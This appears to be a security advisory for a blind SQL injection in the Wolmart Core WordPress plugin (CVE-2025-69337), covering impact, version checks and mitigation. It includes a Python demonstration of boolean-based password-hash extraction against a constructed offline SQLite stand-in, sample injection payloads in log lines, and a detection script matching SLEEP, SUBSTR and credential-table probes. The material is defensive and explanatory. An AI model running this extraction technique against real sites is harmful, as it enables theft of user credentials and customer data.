Platform
wordpress
Component
wolmart-core
Fixed in
1.9.7
CVE-2025-69337 describes a critical SQL Injection vulnerability discovered in the Wolmart Core WordPress plugin. This flaw allows attackers to perform blind SQL injection, potentially leading to unauthorized data access and manipulation. The vulnerability impacts versions from 0.0.0 through 1.9.6, and a patch is available in version 1.9.7.
The SQL injection in Wolmart Core lets an attacker place their own SQL into a query the plugin builds from request input, so the attacker's conditions are evaluated by the site's database with the plugin's (that is, WordPress's) database privileges. Because the injection is blind, the response never echoes query results; the attacker instead infers data one character at a time, either from a true/false difference in the page (boolean-based) or from an induced delay (time-based). This costs many requests per extracted value, but common injection tooling automates it completely. Successful exploitation could expose sensitive data such as usernames, password hashes, email addresses and order details, and, depending on the injection point, allow records to be modified, corrupting data or altering the site's behaviour. The impact is particularly severe given the plugin's use on e-commerce sites, where customer and order data are stored.
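To make the inference mechanism concrete, the following is an added example, not code from Wolmart Core or from don-themes (the plugin's actual vulnerable query has not been published). It shows a stand-in lookup that concatenates request input into SQL the way a vulnerable WordPress plugin might, a boolean-based extraction loop that recovers a password hash from it using only yes/no answers, and the parameterised fix that defeats the same payloads. The table and column names mirror WordPress, the hash value is constructed, and SQLite stands in for MySQL.

```python
"""Boolean-based blind SQL injection, demonstrated against a constructed
stand-in for a vulnerable WordPress query. This is NOT Wolmart Core code;
the real vulnerable code path is not public. SQLite in memory, runs offline."""
import sqlite3
import string

# Constructed sample value standing in for a wp_users.user_pass hash.
SECRET_HASH = "$P$BQ7example"

# Characters tried at each position; WordPress phpass hashes use these.
CHARSET = string.ascii_letters + string.digits + "$./"


def make_db():
    """Build a tiny WordPress-shaped schema with one user and one post."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_pass TEXT)")
    db.execute("INSERT INTO wp_users VALUES (1, 'admin', ?)", (SECRET_HASH,))
    db.execute("CREATE TABLE wp_posts (ID INTEGER, post_title TEXT)")
    db.execute("INSERT INTO wp_posts VALUES (10, 'Hello world')")
    return db


def vulnerable_lookup(db, post_id):
    """Defect class under discussion: request input concatenated into SQL.
    The caller sees only found / not found, which is what makes the
    injection blind; no query output is echoed back."""
    sql = f"SELECT post_title FROM wp_posts WHERE ID = {post_id}"
    return db.execute(sql).fetchone() is not None


def hardened_lookup(db, post_id):
    """Fix: validate the type and bind the value (the equivalent of
    $wpdb->prepare('... WHERE ID = %d', $post_id) in WordPress)."""
    try:
        pid = int(post_id)
    except (TypeError, ValueError):
        return False          # non-integer input is rejected outright
    row = db.execute("SELECT post_title FROM wp_posts WHERE ID = ?", (pid,)).fetchone()
    return row is not None


def extract_user_pass(oracle, db, user_id=1, max_len=64):
    """Recover wp_users.user_pass one character at a time by asking the
    yes/no oracle one question per candidate character.
    Returns (recovered_value, number_of_queries_sent)."""
    recovered, queries = "", 0
    for pos in range(1, max_len + 1):
        matched = None
        for ch in CHARSET:
            # Keep the legitimate predicate (ID = 10) true and AND on a
            # condition that holds only when the guessed character is right.
            payload = (
                f"10 AND (SELECT substr(user_pass,{pos},1) "
                f"FROM wp_users WHERE ID={user_id}) = '{ch}'"
            )
            queries += 1
            if oracle(db, payload):
                matched = ch
                break
        if matched is None:
            break              # substr() past the end matches nothing: done
        recovered += matched
    return recovered, queries


if __name__ == "__main__":
    db = make_db()
    value, n = extract_user_pass(vulnerable_lookup, db)
    print(f"vulnerable: recovered {value!r} using {n} requests")
    value, n = extract_user_pass(hardened_lookup, db)
    print(f"hardened:   recovered {value!r} using {n} requests")
```

Against the vulnerable function the loop recovers the whole constructed hash; against the hardened one the very first probe is rejected and nothing leaks. The query count is the practical takeaway for defenders: blind extraction of a 34-character phpass hash needs on the order of a thousand near-identical requests, which is what makes it visible in logs.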
CVE-2025-69337 was published on 2026-02-20. The vulnerability is rated critical because of the potential for data exfiltration and modification. No public proof-of-concept (PoC) code had been released at the time of writing, but blind SQL injection in a WordPress plugin is the kind of flaw for which a PoC typically follows once the injection point is identified. It is not currently listed in the CISA KEV catalog.
Websites using the Wolmart Core plugin, particularly those running e-commerce stores, are at significant risk. Shared hosting environments are especially exposed where several sites share one database user, or one database server with a user that holds grants across databases, since an injection in one site can then read or modify the others' data. Sites running older, unpatched versions of the plugin are most susceptible.
• wordpress (WP-CLI): confirm the plugin is installed and read its version, then compare it with 1.9.7
wp plugin list | grep wolmart-core
wp plugin get wolmart-core --field=version
• wordpress (filesystem): if WP-CLI is unavailable, read the Version header from the plugin files (the path assumes a default install under /var/www/html)
grep -rh -m1 --include='*.php' '^ \* Version:' /var/www/html/wp-content/plugins/wolmart-core/
• generic web: from outside, a 200 or 403 for the plugin directory usually shows the plugin is present; HTTP response headers carry no version or SQL information, so grepping them for "SQL" proves nothing
curl -sI https://your-wordpress-site.com/wp-content/plugins/wolmart-core/ | head -n 1

Disclosure
Exploit Status
EPSS
0.04% (12th percentile)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2025-69337 is to upgrade the Wolmart Core plugin to version 1.9.7 or later immediately. If upgrading is not immediately feasible because of compatibility issues or breaking changes, temporarily deactivate the plugin to remove the vulnerable code path. A precise WAF rule is hard to write for a blind SQL injection whose injection point has not been published, but a WAF with generic SQL injection rules (time-delay functions such as SLEEP and BENCHMARK, boolean tautologies, UNION SELECT, comment terminators) adds a layer of defence and slows automated extraction. Review database and web server logs for the signature of blind extraction: bursts of near-identical requests or queries that differ only in one literal, time-delay functions, and sub-selects against wp_users or user_pass appearing in queries that normally touch only front-end tables. On the database side, note that a plugin runs with the same MySQL credentials as WordPress itself, so per-plugin permissions are not possible; instead keep the WordPress database user to the minimum it needs (DML on its own schema only; no FILE, SUPER, PROCESS or GRANT privileges, and no access to other sites' databases) so that a successful injection cannot reach beyond that one database.
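As an added example (not part of the advisory, and not a Wolmart Core or WordPress component), the following scans MySQL-style query-log lines for the two signatures just described: generic injection indicators, and one query shape repeated with different literals. The log lines are constructed for the example and the line format is modelled on the MySQL general log (timestamp, connection id, `Query`, SQL); adapt LINE_RE for the slow log or a web access log.

```python
"""Scan MySQL-style query-log lines for the signature of a blind SQL
injection campaign. Added example for this advisory, not a Wolmart Core
or WordPress component; the log lines are constructed and the format is
modelled on the MySQL general log (timestamp, connection id, 'Query', SQL)."""
import re
from collections import Counter

# Constructed sample: one legitimate lookup, three boolean-inference probes
# that differ only in the guessed character, one time-based probe, one
# unrelated legitimate query.
SAMPLE_LOG = """\
2026-02-21T10:15:02.123456Z\t   42 Query\tSELECT post_title FROM wp_posts WHERE ID = 10
2026-02-21T10:15:02.223456Z\t   42 Query\tSELECT post_title FROM wp_posts WHERE ID = 10 AND (SELECT SUBSTR(user_pass,1,1) FROM wp_users WHERE ID=1) = 'a'
2026-02-21T10:15:02.323456Z\t   42 Query\tSELECT post_title FROM wp_posts WHERE ID = 10 AND (SELECT SUBSTR(user_pass,1,1) FROM wp_users WHERE ID=1) = 'b'
2026-02-21T10:15:02.423456Z\t   42 Query\tSELECT post_title FROM wp_posts WHERE ID = 10 AND (SELECT SUBSTR(user_pass,1,1) FROM wp_users WHERE ID=1) = '$'
2026-02-21T10:15:03.000000Z\t   43 Query\tSELECT post_title FROM wp_posts WHERE ID = 10 AND SLEEP(5)
2026-02-21T10:15:04.000000Z\t   44 Query\tSELECT option_value FROM wp_options WHERE option_name = 'siteurl'
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<conn>\d+)\s+Query\s+(?P<sql>.*)$")

# Generic indicators; each tag names the injection technique it points at.
SUSPICIOUS = [
    ("time-based", re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP)\s*\(|\bWAITFOR\s+DELAY\b", re.I)),
    ("boolean-inference", re.compile(r"\b(SUBSTR|SUBSTRING|MID|ASCII|ORD)\s*\(", re.I)),
    ("tautology", re.compile(r"\bOR\s+\d+\s*=\s*\d+", re.I)),
    ("union", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("credential-table", re.compile(r"(?=.*\bwp_users\b)(?=.*\buser_pass\b)", re.I)),
]


def parse(log_text):
    """Yield (timestamp, connection_id, sql) for each Query line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.group("ts"), int(m.group("conn")), m.group("sql")


def normalize(sql):
    """Replace string and numeric literals with '?' so that probes differing
    only in the guessed value collapse to one query shape."""
    sql = re.sub(r"'(?:[^']|'')*'", "?", sql)
    sql = re.sub(r"\b\d+\b", "?", sql)
    return re.sub(r"\s+", " ", sql).strip().upper()


def flag_queries(log_text):
    """Return [(ts, conn, [tags], sql)] for every query matching an indicator."""
    hits = []
    for ts, conn, sql in parse(log_text):
        tags = [name for name, rx in SUSPICIOUS if rx.search(sql)]
        if tags:
            hits.append((ts, conn, tags, sql))
    return hits


def burst_shapes(log_text, threshold=3):
    """Query shapes repeated at least `threshold` times. Blind extraction
    needs one request per candidate character, so the same shape recurs
    with different literals far more often than normal traffic does."""
    counts = Counter(normalize(sql) for _, _, sql in parse(log_text))
    return {shape: n for shape, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for ts, conn, tags, sql in flag_queries(SAMPLE_LOG):
        print(f"{ts} conn={conn} {','.join(tags)}: {sql}")
    for shape, n in burst_shapes(SAMPLE_LOG).items():
        print(f"{n}x {shape}")
```

On the sample, the three probes are tagged both boolean-inference and credential-table and collapse to a single shape seen three times, while the SLEEP probe is tagged time-based and the two legitimate queries are untouched. In production, raise the burst threshold well above three and treat a repeated shape as a finding only when it also carries an indicator tag, since legitimate code reuses the same query shape with different ids all day.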
Update to version 1.9.7, or a newer patched version
CVE-2025-69337 is a critical SQL Injection vulnerability affecting Wolmart Core WordPress plugin versions 0.0.0–1.9.6, allowing attackers to potentially extract data from the database.
If you are using Wolmart Core WordPress plugin versions 0.0.0 through 1.9.6, you are vulnerable to this SQL Injection flaw.
Upgrade the Wolmart Core plugin to version 1.9.7 or later to resolve this vulnerability. If immediate upgrade is not possible, temporarily disable the plugin.
While no active exploitation has been confirmed, the nature of blind SQL injection suggests potential for exploitation, and monitoring is recommended.
Refer to the official Wolmart Core plugin website or the don-themes support channels for the latest advisory and updates regarding CVE-2025-69337.